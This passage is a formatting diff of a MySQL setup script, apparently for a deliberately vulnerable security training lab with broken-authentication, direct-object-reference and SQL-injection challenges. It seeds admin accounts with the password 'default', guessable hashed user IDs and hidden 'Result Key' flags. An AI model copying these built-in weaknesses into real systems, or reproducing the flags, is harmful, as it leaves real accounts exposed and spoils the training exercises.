+  PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `BrokenAuthAndSessMangChalTwo`.`users`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`BrokenAuthAndSessMangChalTwo`;
-INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`)
-VALUES (12, 'admin', 'default', 'zoidberg22@shepherd.com');
-INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`)
-VALUES (321, 'administrator', 'default', 'buzzthebald@shepherd.com');
-INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`)
-VALUES (3212, 'root', 'default', 'elitehacker@shepherd.com');
-INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`)
-VALUES (634, 'superuser', 'default', 'superman@security.com');
-INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`)
-VALUES (4524, 'privileged', 'default', 'spoiltbrat@security.com');
+USE `BrokenAuthAndSessMangChalTwo`;
+INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`) VALUES (12, 'admin', 'default', 'zoidberg22@shepherd.com');
+INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`) VALUES (321, 'administrator', 'default', 'buzzthebald@shepherd.com');
+INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`) VALUES (3212, 'root', 'default', 'elitehacker@shepherd.com');
+INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`) VALUES (634, 'superuser', 'default', 'superman@security.com');
+INSERT INTO `BrokenAuthAndSessMangChalTwo`.`users` (`userId`, `userName`, `userPassword`, `userAddress`) VALUES (4524, 'privileged', 'default', 'spoiltbrat@security.com');
 
 COMMIT;
 
 -- ======================================================
 -- BrokenAuthAndSessMangChalThree
 -- ======================================================
-DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalThree`;
-CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalThree` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`BrokenAuthAndSessMangChalThree`;
+DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalThree` ;
+CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalThree` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `BrokenAuthAndSessMangChalThree`;
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
 
 -- -----------------------------------------------------
 -- Table `BrokenAuthAndSessMangChalThree`.`users`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalThree`.`users`
-(
-    `userId`
-    INT
-    NOT
-    NULL,
-    `userName`
-    VARCHAR
-(
-    32
-) NOT NULL ,
-    `userPassword` VARCHAR
-(
-    128
-) NOT NULL ,
-    `userAddress` VARCHAR
-(
-    128
-) NOT NULL ,
-    `userRole` VARCHAR
-(
-    8
-) NOT NULL DEFAULT 'guest' ,
-    PRIMARY KEY
-(
-    `userId`
-) )
-    ENGINE = InnoDB;
-
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE  TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalThree`.`users` (
+  `userId` INT NOT NULL ,
+  `userName` VARCHAR(32) NOT NULL ,
+  `userPassword` VARCHAR(128) NOT NULL ,
+  `userAddress` VARCHAR(128) NOT NULL ,
+  `userRole` VARCHAR(8) NOT NULL DEFAULT 'guest' ,
+  PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `BrokenAuthAndSessMangChalThree`.`users`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`BrokenAuthAndSessMangChalThree`;
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (12, 'admin', 'default', 'zoidberg22@shepherd.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (321, 'administrator', 'default', 'buzzthebald@shepherd.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (3212, 'root', 'default', 'elitehacker@shepherd.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (634, 'superuser', 'default', 'superman@security.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (4524, 'privileged', 'default', 'spoiltbrat@security.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (40, 'guest1', 'default', 'guest1@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (41, 'guest2', 'default', 'guest2@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (42, 'guest3', 'default', 'guest3@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (43, 'guest4', 'default', 'guest4@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (44, 'guest5', 'default', 'guest5@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (45, 'guest6', 'default', 'guest6@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (46, 'guest7', 'default', 'guest7@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (47, 'guest8', 'default', 'guest8@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (48, 'guest9', 'guest', 'guest9@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (49, 'guest11', 'guest', 'guest11@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (50, 'guest12', 'guest', 'guest12@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (51, 'guest13', 'guest', 'guest13@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (52, 'guest14', 'guest', 'guest14@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (53, 'guest15', 'guest', 'guest15@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (54, 'guest16', 'guest', 'guest16@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (55, 'guest17', 'guest', 'guest17@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (56, 'guest18', 'guest', 'guest18@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (57, 'guest19', 'guest', 'guest19@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (58, 'guest20', 'guest', 'guest20@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (59, 'guest21', 'guest', 'guest21@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (60, 'guest22', 'guest', 'guest22@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (61, 'guest23', 'guest', 'guest23@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (62, 'guest10', 'guest', 'guest10@guest.com', 'guest');
+USE `BrokenAuthAndSessMangChalThree`;
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (12, 'admin', 'default', 'zoidberg22@shepherd.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (321, 'administrator', 'default', 'buzzthebald@shepherd.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (3212, 'root', 'default', 'elitehacker@shepherd.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (634, 'superuser', 'default', 'superman@security.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (4524, 'privileged', 'default', 'spoiltbrat@security.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (40, 'guest1', 'default', 'guest1@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (41, 'guest2', 'default', 'guest2@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (42, 'guest3', 'default', 'guest3@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (43, 'guest4', 'default', 'guest4@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (44, 'guest5', 'default', 'guest5@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (45, 'guest6', 'default', 'guest6@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (46, 'guest7', 'default', 'guest7@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (47, 'guest8', 'default', 'guest8@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (48, 'guest9', 'guest', 'guest9@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (49, 'guest11', 'guest', 'guest11@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (50, 'guest12', 'guest', 'guest12@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (51, 'guest13', 'guest', 'guest13@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (52, 'guest14', 'guest', 'guest14@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (53, 'guest15', 'guest', 'guest15@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (54, 'guest16', 'guest', 'guest16@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (55, 'guest17', 'guest', 'guest17@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (56, 'guest18', 'guest', 'guest18@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (57, 'guest19', 'guest', 'guest19@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (58, 'guest20', 'guest', 'guest20@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (59, 'guest21', 'guest', 'guest21@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (60, 'guest22', 'guest', 'guest22@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (61, 'guest23', 'guest', 'guest23@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (62, 'guest10', 'guest', 'guest10@guest.com', 'guest');
 
 COMMIT;
 
@@ -495,65 +292,41 @@ COMMIT;
 -- directObjectRefChalOne
 -- ======================================================
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
-DROP SCHEMA IF EXISTS `directObjectRefChalOne`;
-CREATE SCHEMA IF NOT EXISTS `directObjectRefChalOne` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`directObjectRefChalOne` ;
+DROP SCHEMA IF EXISTS `directObjectRefChalOne` ;
+CREATE SCHEMA IF NOT EXISTS `directObjectRefChalOne` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `directObjectRefChalOne` ;
 
 -- -----------------------------------------------------
 -- Table `directObjectRefChalOne`.`users`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `directObjectRefChalOne`.`users`
-(
-    `userId` VARCHAR
-(
-    32
-) NOT NULL ,
-    `userName` VARCHAR
-(
-    32
-) NOT NULL ,
-    `privateMessage` MEDIUMTEXT NOT NULL ,
-    PRIMARY KEY
-(
-    `userId`
-) )
-    ENGINE = InnoDB;
-
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE  TABLE IF NOT EXISTS `directObjectRefChalOne`.`users` (
+  `userId` VARCHAR(32) NOT NULL ,
+  `userName` VARCHAR(32) NOT NULL ,
+  `privateMessage` MEDIUMTEXT NOT NULL ,
+  PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `directObjectRefChalOne`.`users`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`directObjectRefChalOne`;
-INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('1', 'Paul Bourke', 'No Message Set');
-INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('3', 'Will Bailey', 'I love Go Karting');
-INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('5', 'Orla Cleary', 'As if!');
-INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('7', 'Ronan Fitzpatrick', 'I have retired');
-INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('9', 'Pat McKenana', 'I have a car!');
-INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('11', 'Hidden User', 'Result Key is <a>dd6301b38b5ad9c54b85d07c087aebec89df8b8c769d4da084a55663e6186742</a>');
+USE `directObjectRefChalOne`;
+INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('1', 'Paul Bourke', 'No Message Set');
+INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('3', 'Will Bailey', 'I love Go Karting');
+INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('5', 'Orla Cleary', 'As if!');
+INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('7', 'Ronan Fitzpatrick', 'I have retired');
+INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('9', 'Pat McKenana', 'I have a car!');
+INSERT INTO `directObjectRefChalOne`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('11', 'Hidden User', 'Result Key is <a>dd6301b38b5ad9c54b85d07c087aebec89df8b8c769d4da084a55663e6186742</a>');
 
 COMMIT;
 
@@ -561,202 +334,109 @@ COMMIT;
 -- directObjectRefChalTwo
 -- ======================================================
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
-DROP SCHEMA IF EXISTS `directObjectRefChalTwo`;
-CREATE SCHEMA IF NOT EXISTS `directObjectRefChalTwo` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`directObjectRefChalTwo` ;
+DROP SCHEMA IF EXISTS `directObjectRefChalTwo` ;
+CREATE SCHEMA IF NOT EXISTS `directObjectRefChalTwo` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `directObjectRefChalTwo` ;
 
 -- -----------------------------------------------------
 -- Table `directObjectRefChalTwo`.`users`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `directObjectRefChalTwo`.`users`
-(
-    `userId` VARCHAR
-(
-    32
-) NOT NULL ,
-    `userName` VARCHAR
-(
-    32
-) NOT NULL ,
-    `privateMessage` MEDIUMTEXT NOT NULL ,
-    PRIMARY KEY
-(
-    `userId`
-) )
-    ENGINE = InnoDB;
-
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE  TABLE IF NOT EXISTS `directObjectRefChalTwo`.`users` (
+  `userId` VARCHAR(32) NOT NULL ,
+  `userName` VARCHAR(32) NOT NULL ,
+  `privateMessage` MEDIUMTEXT NOT NULL ,
+  PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `directObjectRefChalTwo`.`users`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`directObjectRefChalTwo`;
-INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('c81e728d9d4c2f636f067f89cc14862c', 'Joe Sullivan', 'I was going to set a message, but then I decided not to.');
-INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('eccbc87e4b5ce2fe28308fd9f2a7baf3', 'Will Bailey', 'I love Go Karting');
-INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('e4da3b7fbbce2345d7772b0674a318d5', 'Orla Cleary',
-        'As if Im going to set a message. Who knows who could read it!');
-INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('8f14e45fceea167a5a36dedd4bea2543', 'Ronan Fitzpatrick', 'I have retired');
-INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('6512bd43d9caa6e02c990b0a82652dca', 'Pat McKenana', 'I have a car!');
-INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`)
-VALUES ('c51ce410c124a10e0db5e4b97fc2af39', 'Hidden User',
-        'Result Key is <a>1f746b87a4e3628b90b1927de23f6077abdbbb64586d3ac9485625da21921a0f</a>');
+USE `directObjectRefChalTwo`;
+INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('c81e728d9d4c2f636f067f89cc14862c', 'Joe Sullivan', 'I was going to set a message, but then I decided not to.');
+INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('eccbc87e4b5ce2fe28308fd9f2a7baf3', 'Will Bailey', 'I love Go Karting');
+INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('e4da3b7fbbce2345d7772b0674a318d5', 'Orla Cleary', 'As if Im going to set a message. Who knows who could read it!');
+INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('8f14e45fceea167a5a36dedd4bea2543', 'Ronan Fitzpatrick', 'I have retired');
+INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('6512bd43d9caa6e02c990b0a82652dca', 'Pat McKenana', 'I have a car!');
+INSERT INTO `directObjectRefChalTwo`.`users` (`userId`, `userName`, `privateMessage`) VALUES ('c51ce410c124a10e0db5e4b97fc2af39', 'Hidden User', 'Result Key is <a>1f746b87a4e3628b90b1927de23f6077abdbbb64586d3ac9485625da21921a0f</a>');
 
 COMMIT;
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
 
-DROP SCHEMA IF EXISTS `SQLiC5Shop`;
-CREATE SCHEMA IF NOT EXISTS `SQLiC5Shop` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`SQLiC5Shop` ;
+DROP SCHEMA IF EXISTS `SQLiC5Shop` ;
+CREATE SCHEMA IF NOT EXISTS `SQLiC5Shop` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `SQLiC5Shop` ;
 
 -- -----------------------------------------------------
 -- Table `SQLiC5Shop`.`items`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SQLiC5Shop`.`items`
-(
-    `itemId`
-    INT
-    NOT
-    NULL,
-    `itemName`
-    VARCHAR
-(
-    45
-) NULL,
-    `itemCost` INT NULL,
-    PRIMARY KEY
-(
-    `itemId`
-))
-    ENGINE = InnoDB;
+CREATE TABLE IF NOT EXISTS `SQLiC5Shop`.`items` (
+  `itemId` INT NOT NULL,
+  `itemName` VARCHAR(45) NULL,
+  `itemCost` INT NULL,
+  PRIMARY KEY (`itemId`))
+ENGINE = InnoDB;
 
 -- -----------------------------------------------------
 -- Table `SQLiC5Shop`.`coupons`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SQLiC5Shop`.`coupons`
-(
-    `couponId`
-    INT
-    NOT
-    NULL,
-    `perCentOff`
-    INT
-    NULL,
-    `couponCode`
-    VARCHAR
-(
-    128
-) NULL,
-    `itemId` INT NOT NULL,
-    PRIMARY KEY
-(
-    `couponId`
-),
-    INDEX `fk_coupons_items_idx`
-(
-    `itemId` ASC
-),
-    CONSTRAINT `fk_coupons_items`
-    FOREIGN KEY
-(
-    `itemId`
-)
-    REFERENCES `SQLiC5Shop`.`items`
-(
-    `itemId`
-)
+CREATE TABLE IF NOT EXISTS `SQLiC5Shop`.`coupons` (
+  `couponId` INT NOT NULL,
+  `perCentOff` INT NULL,
+  `couponCode` VARCHAR(128) NULL,
+  `itemId` INT NOT NULL,
+  PRIMARY KEY (`couponId`),
+  INDEX `fk_coupons_items_idx` (`itemId` ASC),
+  CONSTRAINT `fk_coupons_items`
+    FOREIGN KEY (`itemId`)
+    REFERENCES `SQLiC5Shop`.`items` (`itemId`)
     ON DELETE NO ACTION
     ON UPDATE NO ACTION)
-    ENGINE = InnoDB;
+ENGINE = InnoDB;
 
 -- -----------------------------------------------------
 -- Table `SQLiC5Shop`.`vipCoupons`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SQLiC5Shop`.`vipCoupons`
-(
-    `vipCouponId`
-    INT
-    NOT
-    NULL,
-    `perCentOff`
-    INT
-    NULL,
-    `couponCode`
-    VARCHAR
-(
-    128
-) NULL,
-    `itemId` INT NOT NULL,
-    PRIMARY KEY
-(
-    `vipCouponId`
-),
-    INDEX `fk_vipCoupons_items1_idx`
-(
-    `itemId` ASC
-),
-    CONSTRAINT `fk_vipCoupons_items1`
-    FOREIGN KEY
-(
-    `itemId`
-)
-    REFERENCES `SQLiC5Shop`.`items`
-(
-    `itemId`
-)
